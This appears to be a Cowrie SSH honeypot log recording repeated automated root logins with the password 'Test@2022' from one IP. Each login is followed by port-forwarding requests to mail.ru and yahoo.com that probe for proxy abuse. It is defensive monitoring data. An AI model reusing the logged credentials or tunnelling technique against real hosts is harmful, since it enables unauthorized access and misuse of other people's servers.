{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:58.912657Z","src_ip":"77.83.207.83","session":"743551303a9e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:59.161873Z","src_ip":"77.83.207.83","session":"743551303a9e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":1167,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:1167","sensor":"my-vps","timestamp":"2025-08-31T03:50:59.212493Z","session":"743551303a9e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:59.262516Z","src_ip":"77.83.207.83","session":"743551303a9e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":18481,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:18481","sensor":"my-vps","timestamp":"2025-08-31T03:50:59.404505Z","session":"743551303a9e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:59.454519Z","src_ip":"77.83.207.83","session":"743551303a9e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":13297,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:13297","sensor":"my-vps","timestamp":"2025-08-31T03:50:59.596398Z","session":"743551303a9e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:59.646410Z","src_ip":"77.83.207.83","session":"743551303a9e"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:59.697297Z","src_ip":"77.83.207.83","session":"743551303a9e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":20262,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2c07139c124","protocol":"ssh","message":"New connection: 77.83.207.83:20262 (1.2.3.4:22) [session: a2c07139c124]","sensor":"my-vps","timestamp":"2025-08-31T03:50:59.746853Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:59.756244Z","src_ip":"77.83.207.83","session":"a2c07139c124"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:59.797216Z","src_ip":"77.83.207.83","session":"a2c07139c124"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:00.046928Z","src_ip":"77.83.207.83","session":"a2c07139c124"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":15784,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:15784","sensor":"my-vps","timestamp":"2025-08-31T03:51:00.098111Z","session":"a2c07139c124"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:00.149117Z","src_ip":"77.83.207.83","session":"a2c07139c124"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":5496,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:5496","sensor":"my-vps","timestamp":"2025-08-31T03:51:00.292509Z","session":"a2c07139c124"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:00.342762Z","src_ip":"77.83.207.83","session":"a2c07139c124"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":29592,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:29592","sensor":"my-vps","timestamp":"2025-08-31T03:51:00.484390Z","session":"a2c07139c124"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:00.534421Z","src_ip":"77.83.207.83","session":"a2c07139c124"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:00.585356Z","src_ip":"77.83.207.83","session":"a2c07139c124"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46292,"dst_ip":"1.2.3.4","dst_port":22,"session":"9cb77ceeb8d3","protocol":"ssh","message":"New connection: 212.227.235.229:46292 (1.2.3.4:22) [session: 9cb77ceeb8d3]","sensor":"my-vps","timestamp":"2025-08-31T03:51:00.607518Z"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":20393,"dst_ip":"1.2.3.4","dst_port":22,"session":"68f965b98391","protocol":"ssh","message":"New connection: 77.83.207.83:20393 (1.2.3.4:22) [session: 68f965b98391]","sensor":"my-vps","timestamp":"2025-08-31T03:51:00.633628Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:00.634272Z","src_ip":"77.83.207.83","session":"68f965b98391"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:00.684515Z","src_ip":"77.83.207.83","session":"68f965b98391"}
{"eventid":"cowrie.session.closed","duration":12.761558771133423,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:00.902538Z","src_ip":"212.227.235.229","session":"8fcc5578bae7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:00.933372Z","src_ip":"77.83.207.83","session":"68f965b98391"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":12735,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:12735","sensor":"my-vps","timestamp":"2025-08-31T03:51:00.984257Z","session":"68f965b98391"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:01.034835Z","src_ip":"77.83.207.83","session":"68f965b98391"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54090,"dst_ip":"1.2.3.4","dst_port":23,"session":"60ac12623e10","protocol":"telnet","message":"New connection: 212.227.235.229:54090 (1.2.3.4:23) [session: 60ac12623e10]","sensor":"my-vps","timestamp":"2025-08-31T03:51:01.146992Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":29847,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:29847","sensor":"my-vps","timestamp":"2025-08-31T03:51:01.176342Z","session":"68f965b98391"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:01.226491Z","src_ip":"77.83.207.83","session":"68f965b98391"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":3618,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:3618","sensor":"my-vps","timestamp":"2025-08-31T03:51:01.368609Z","session":"68f965b98391"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:01.419008Z","src_ip":"77.83.207.83","session":"68f965b98391"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:01.469961Z","src_ip":"77.83.207.83","session":"68f965b98391"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":20488,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e51bd5c00a0","protocol":"ssh","message":"New connection: 77.83.207.83:20488 (1.2.3.4:22) [session: 2e51bd5c00a0]","sensor":"my-vps","timestamp":"2025-08-31T03:51:01.520725Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:01.531040Z","src_ip":"77.83.207.83","session":"2e51bd5c00a0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:01.573403Z","src_ip":"77.83.207.83","session":"2e51bd5c00a0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:01.829616Z","src_ip":"77.83.207.83","session":"2e51bd5c00a0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":18427,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:18427","sensor":"my-vps","timestamp":"2025-08-31T03:51:01.882134Z","session":"2e51bd5c00a0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:01.934191Z","src_ip":"77.83.207.83","session":"2e51bd5c00a0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":31953,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:31953","sensor":"my-vps","timestamp":"2025-08-31T03:51:02.077580Z","session":"2e51bd5c00a0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:02.129092Z","src_ip":"77.83.207.83","session":"2e51bd5c00a0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":25234,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:25234","sensor":"my-vps","timestamp":"2025-08-31T03:51:02.273481Z","session":"2e51bd5c00a0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:02.324872Z","src_ip":"77.83.207.83","session":"2e51bd5c00a0"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:02.376924Z","src_ip":"77.83.207.83","session":"2e51bd5c00a0"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":20580,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d0bfd20fa07","protocol":"ssh","message":"New connection: 77.83.207.83:20580 (1.2.3.4:22) [session: 3d0bfd20fa07]","sensor":"my-vps","timestamp":"2025-08-31T03:51:02.426092Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:02.427254Z","src_ip":"77.83.207.83","session":"3d0bfd20fa07"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:02.477726Z","src_ip":"77.83.207.83","session":"3d0bfd20fa07"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:02.729336Z","src_ip":"77.83.207.83","session":"3d0bfd20fa07"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":13091,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:13091","sensor":"my-vps","timestamp":"2025-08-31T03:51:02.781433Z","session":"3d0bfd20fa07"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:02.831763Z","src_ip":"77.83.207.83","session":"3d0bfd20fa07"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":3988,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:3988","sensor":"my-vps","timestamp":"2025-08-31T03:51:02.972531Z","session":"3d0bfd20fa07"}
